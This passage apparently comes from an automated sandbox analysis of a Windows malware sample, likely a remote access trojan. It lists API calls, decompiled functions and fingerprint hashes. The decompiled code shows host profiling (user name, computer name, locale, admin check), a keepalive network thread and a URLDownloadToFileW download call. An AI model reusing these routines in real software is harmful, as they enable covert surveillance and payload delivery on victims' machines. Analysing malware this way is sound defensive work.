                                  • SetEvent.KERNEL32(?), ref: 0040D2C5
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040D2CE
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6B015DF0), ref: 0040D2E8
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 0040D2F9
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040D308
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • GetTickCount.KERNEL32 ref: 0040D33C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000,?,?,00000000), ref: 0040D39C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,00000000,?,?,00000000), ref: 0040D3AC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,00000000,?,?,00000000), ref: 0040D3BC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,00000000,?,?,00000000), ref: 0040D3CC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,00000000,?,?), ref: 0040D3DC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0040D3E6
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004C), ref: 0040D402
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D40E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D41A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D426
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D432
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D43E
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D44A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D456
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D462
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 0040D474
                                  • atoi.MSVCRT ref: 0040D47B
                                  • Sleep.KERNEL32(00000064), ref: 0040DD60
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000001), ref: 0040DD83
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000), ref: 0040DD95
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040DDB0
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000), ref: 0040DDBB
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000002,00000000), ref: 0040DDDD
                                  • URLDownloadToFileW.URLMON(00000000,00000000), ref: 0040DDE5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040DDF9
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040DE0D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$G@2@@std@@G@std@@$?c_str@?$basic_string@D@2@@0@Hstd@@V10@0@V?$basic_string@$??0?$basic_string@V01@@$?length@?$basic_string@V12@$?substr@?$basic_string@$??4?$basic_string@?find@?$basic_string@CountD@1@@DownloadEventFileSleepTickV01@atoi
                                  • String ID: $$PowrProf.dll$SetSuspendState
                                  • API String ID: 2465730144-1158640710
                                  • Opcode ID: b44c68743557f4f09f7a9a42c0d9c3994339862daf0c9e982cee1bf9a3d0bef1
                                  • Instruction ID: 8b97f5ae68acd249977ecc05ae4d1582f654e66521c0ff460722a1e21975d306
                                  • Opcode Fuzzy Hash: b44c68743557f4f09f7a9a42c0d9c3994339862daf0c9e982cee1bf9a3d0bef1
                                  • Instruction Fuzzy Hash: D8529372900208EBDB04BBB1EC59AEE7768EF54305F10487EF512A70E2DF785A54CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00409908() {
                                  				struct HINSTANCE__* _t1;
                                  				_Unknown_base(*)()* _t2;
                                  				_Unknown_base(*)()* _t22;
                                  
                                  				_t1 = LoadLibraryA("Psapi.dll"); // executed
                                  				_t2 = GetProcAddress(_t1, "GetModuleFileNameExA");
                                  				 *0x41bc94 = _t2;
                                  				if(_t2 == 0) {
                                  					 *0x41bc94 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExA");
                                  				}
                                  				 *0x41bc90 = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExW");
                                  				if( *0x41bc94 == 0) {
                                  					 *0x41bc90 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExW");
                                  				}
                                  				 *0x41bca0 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
                                  				 *0x41c1e4 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
                                  				 *0x41c1e8 = GetProcAddress(GetModuleHandleA("kernel32"), "GetComputerNameExW");
                                  				 *0x41bc98 = GetProcAddress(GetModuleHandleA("Shell32"), "IsUserAnAdmin");
                                  				 *0x41bcd0 = GetProcAddress(GetModuleHandleA("kernel32"), "SetProcessDEPPolicy");
                                  				 *0x41bca4 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayDevicesW");
                                  				 *0x41bc78 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayMonitors");
                                  				 *0x41bca8 = GetProcAddress(GetModuleHandleA("user32"), "GetMonitorInfoW");
                                  				_t22 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc);
                                  				 *0x41bc9c = _t22;
                                  				return _t22;
                                   			}

                                  APIs
                                  • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExA,0041BA38,0041BCB0,00000000,00408F24,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040991B
                                  • GetProcAddress.KERNEL32(00000000), ref: 00409924
                                  • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040993F
                                  • GetProcAddress.KERNEL32(00000000), ref: 00409942
                                  • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409953
                                  • GetProcAddress.KERNEL32(00000000), ref: 00409956
                                  • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409970
                                  • GetProcAddress.KERNEL32(00000000), ref: 00409973
                                  • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409984
                                  • GetProcAddress.KERNEL32(00000000), ref: 00409987
                                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409998
                                  • GetProcAddress.KERNEL32(00000000), ref: 0040999B
                                  • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099AC
                                  • GetProcAddress.KERNEL32(00000000), ref: 004099AF
                                  • GetModuleHandleA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099C0
                                  • GetProcAddress.KERNEL32(00000000), ref: 004099C3
                                  • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099D4
                                  • GetProcAddress.KERNEL32(00000000), ref: 004099D7
                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099E8
                                  • GetProcAddress.KERNEL32(00000000), ref: 004099EB
                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099FC
                                  • GetProcAddress.KERNEL32(00000000), ref: 004099FF
                                  • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409A10
                                  • GetProcAddress.KERNEL32(00000000), ref: 00409A13
                                  • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409A21
                                  • GetProcAddress.KERNEL32(00000000), ref: 00409A24
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$HandleModule$LibraryLoad
                                  • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$Psapi.dll$SetProcessDEPPolicy$Shell32$Shlwapi.dll$kernel32$kernel32.dll$user32
                                  • API String ID: 551388010-2914448473
                                  • Opcode ID: 94181ff0da5f878129800e6c898616cd0638ed43b76235def3f7d6061dc3ba3f
                                  • Instruction ID: 4c9355c828fc4da35060c465c8423d7dda30a1a04bb52c9e9a5aad065eac730d
                                  • Opcode Fuzzy Hash: 94181ff0da5f878129800e6c898616cd0638ed43b76235def3f7d6061dc3ba3f
                                  • Instruction Fuzzy Hash: F721AFB0E81358B9DA206BB56C4EFDB7E59DA94B54323442BB40893194EFBCC480CEDC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 37%
                                  			E00402580(void* __ecx, intOrPtr _a4, intOrPtr _a8, char _a11) {
                                  				struct _SYSTEMTIME _v20;
                                  				char _v36;
                                  				void* _v52;
                                  				char* _t25;
                                  				char* _t26;
                                  				intOrPtr _t35;
                                  				void* _t37;
                                  
                                  				_t37 = __ecx;
                                  				if( *((intOrPtr*)(__ecx + 0x38)) != 0) {
                                  					__eflags = 0;
                                  					return 0;
                                  				}
                                  				_t35 = _a4;
                                  				if(_a8 != 0) {
                                  					__eflags =  *0x41bcac; // 0x0
                                  					if(__eflags != 0) {
                                  						GetLocalTime( &_v20);
                                  						_t25 =  &_a11;
                                  						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [INFO] ", _t25, "KeepAlive Enabled! Timeout: %i seconds\n", _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff, _v20.wSecond & 0x0000ffff, _v20.wMilliseconds & 0x0000ffff, _t35);
                                  						_t26 =  &_v36;
                                  						L00414170();
                                  						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t26, _t25);
                                  						printf(_t26);
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					}
                                  				} else {
                                  					 *((char*)(__ecx + 0x44)) = 1;
                                  				}
                                  				 *((char*)(_t37 + 0x38)) = 1;
                                  				 *((intOrPtr*)(_t37 + 0x3c)) = _t35;
                                  				CreateThread(0, 0, E004027A2, _t37, 0, 0); // executed
                                  				return 1;
                                   			}

                                  APIs
                                  • GetLocalTime.KERNEL32(?,00000001,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,0040CAF3,0000000A,00000000), ref: 004025B0
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [INFO] ,?,KeepAlive Enabled! Timeout: %i seconds,0000000A,?,00000000,?,0000000A), ref: 004025DC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,0040CAF3,0000000A,00000000), ref: 004025E7
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,0040CAF3,0000000A,00000000), ref: 004025F1
                                  • printf.MSVCRT ref: 004025F8
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402604
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040260D
                                  • CreateThread.KERNEL32(00000000,00000000,004027A2,0041BE70,00000000,00000000), ref: 00402624
                                  Strings
                                  • KeepAlive Enabled! Timeout: %i seconds, xrefs: 004025D1
                                  • %02i:%02i:%02i:%03i [INFO] , xrefs: 004025D7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@CreateD@1@@D@2@@0@Hstd@@LocalThreadTimeV10@V?$basic_string@printf
                                  • String ID: %02i:%02i:%02i:%03i [INFO] $KeepAlive Enabled! Timeout: %i seconds
                                  • API String ID: 3715082883-586133315
                                  • Opcode ID: 51604d627dacd7a8ae8a3435ef703a50610ed316e6cde58bd2f1e49f68c81dc1
                                  • Instruction ID: a312a60622e34753c5bc094497f25c33392341c8bb354fb046c7070d615c6ac2
                                  • Opcode Fuzzy Hash: 51604d627dacd7a8ae8a3435ef703a50610ed316e6cde58bd2f1e49f68c81dc1
                                  • Instruction Fuzzy Hash: A611EB71800258FFCB119BE1DC48DFFBBBCAB95705B004426F842A3190D6B99944CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 0040215B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 00402168
                                  • malloc.MSVCRT ref: 00402175
                                  • recv.WS2_32(0041BE70,00000000,000003E8,00000000), ref: 00402186
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8), ref: 0040219A
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021A4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021AD
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021BA
                                    • Part of subcall function 0040221E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,0041BE70,00000000), ref: 00402230
                                    • Part of subcall function 0040221E: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 00402248
                                    • Part of subcall function 0040221E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402257
                                    • Part of subcall function 0040221E: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402261
                                    • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040227A
                                    • Part of subcall function 0040221E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402283
                                    • Part of subcall function 0040221E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0040D2A6,0041BEA4), ref: 004022A2
                                    • Part of subcall function 0040221E: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004022C2
                                    • Part of subcall function 0040221E: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 004022DA
                                    • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(0040D2A6), ref: 004022EC
                                    • Part of subcall function 0040221E: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0000000F,6B015DF0), ref: 00402302
                                    • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040230C
                                    • Part of subcall function 0040221E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402315
                                    • Part of subcall function 0040221E: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,0040D2A6), ref: 00402326
                                    • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00402330
                                    • Part of subcall function 0040221E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402339
                                    • Part of subcall function 0040221E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040234D
                                  • free.MSVCRT(00000000,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021DB
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 00402204
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 0040220D
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$V01@@$??1?$basic_string@V01@$??0?$basic_string@??4?$basic_string@$D@1@@$??9std@@?substr@?$basic_string@D@2@@0@V12@V?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@?length@?$basic_string@?size@?$basic_string@Y?$basic_string@freemallocrecv
                                  • String ID:
                                  • API String ID: 2200674315-0
                                  • Opcode ID: 533559aab0e3dcf38d7224a0014533e596ea9eed5f72da431cbdb498b9f83fa6
                                  • Instruction ID: 77ffb52b31aa9a22c106954051cf48487ac881783d2d7cd2d5b7dec6e0024f6e
                                  • Opcode Fuzzy Hash: 533559aab0e3dcf38d7224a0014533e596ea9eed5f72da431cbdb498b9f83fa6
                                  • Instruction Fuzzy Hash: 0221443250050DEBCB15EBA0DE49EDEB7B9FF94745B104029E902B21D1DBB56A05CB14
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 28%
                                  			E00412163(intOrPtr _a4) {
                                  				char _v5;
                                  				char _v12;
                                  				long _v16;
                                  				char _v32;
                                  				void* _v48;
                                  				char _v80;
                                  				short _v592;
                                  				char* _t23;
                                  				char* _t25;
                                  
                                  				_v12 = 0x10;
                                  				 *0x41c1e8(1,  &_v80,  &_v12); // executed
                                  				_v16 = 0x100;
                                  				GetUserNameW( &_v592,  &_v16); // executed
                                  				_t23 =  &_v5;
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z("/", _t23,  &_v592);
                                  				_t25 =  &_v32;
                                  				L0041416A();
                                  				L00414146();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_a4, _t25, _t25,  &_v80, _t23);
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				return _a4;
                                   			}

                                  APIs
                                  • GetUserNameW.ADVAPI32(?,?), ref: 00412195
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00416C08,?,?), ref: 004121AE
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 004121BD
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(00000010,00000000), ref: 004121C9
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004121D4
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004121DD
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@G@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@G@1@@NameUserV10@V10@@
                                  • String ID:
                                  • API String ID: 3382107156-0
                                  • Opcode ID: b8e59d28f1cfdb65fc57b1756a71ba3e9b4df3560f8848897e1e7dd21217353c
                                  • Instruction ID: b94a0025ee3120f282ce46cac819fd7ffee2fdf7fe7efc1014d8e4d368efe18d
                                  • Opcode Fuzzy Hash: b8e59d28f1cfdb65fc57b1756a71ba3e9b4df3560f8848897e1e7dd21217353c
                                  • Instruction Fuzzy Hash: E301DE72C0010DEBDB01DF94DC49EDEBB7CEB48304F108062F915E2150EB75A6898FA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 37%
                                  E00409E7D(void* __ecx, intOrPtr _a4) {
                                      char _v5;
                                      char _v8;

                                      GetLocaleInfoA(0x800, 0x5a, &_v8, 3); // executed
                                      __imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(&_v8, &_v5, __ecx);
                                      return _a4;
                                  }

                                  APIs
                                  • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,0041BFB8,?,0040CCE4,?,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,2.7.2 Pro), ref: 00409E8E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CCE4,?,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,2.7.2 Pro,0041B310,00000000,0041B310), ref: 00409E9F
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$??0?$basic_string@D@1@@D@2@@std@@D@std@@InfoLocaleU?$char_traits@
                                  • String ID:
                                  • API String ID: 4090406865-0
                                  • Opcode ID: 501cb2897031f947fe62341dcca9b5086cc5479430e65b3761638e752ef95d52
                                  • Instruction ID: 6bf4cb4ccd2def3a4df93ba3bf87f565bdd40bf68ca9332086adf1bee5c68202
                                  • Opcode Fuzzy Hash: 501cb2897031f947fe62341dcca9b5086cc5479430e65b3761638e752ef95d52
                                  • Instruction Fuzzy Hash: 80E0EC7560020DFBDB00DB90DC45ECA776CAB48745F004051BA0296190D670A7088BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 00409823: malloc.MSVCRT ref: 00409846
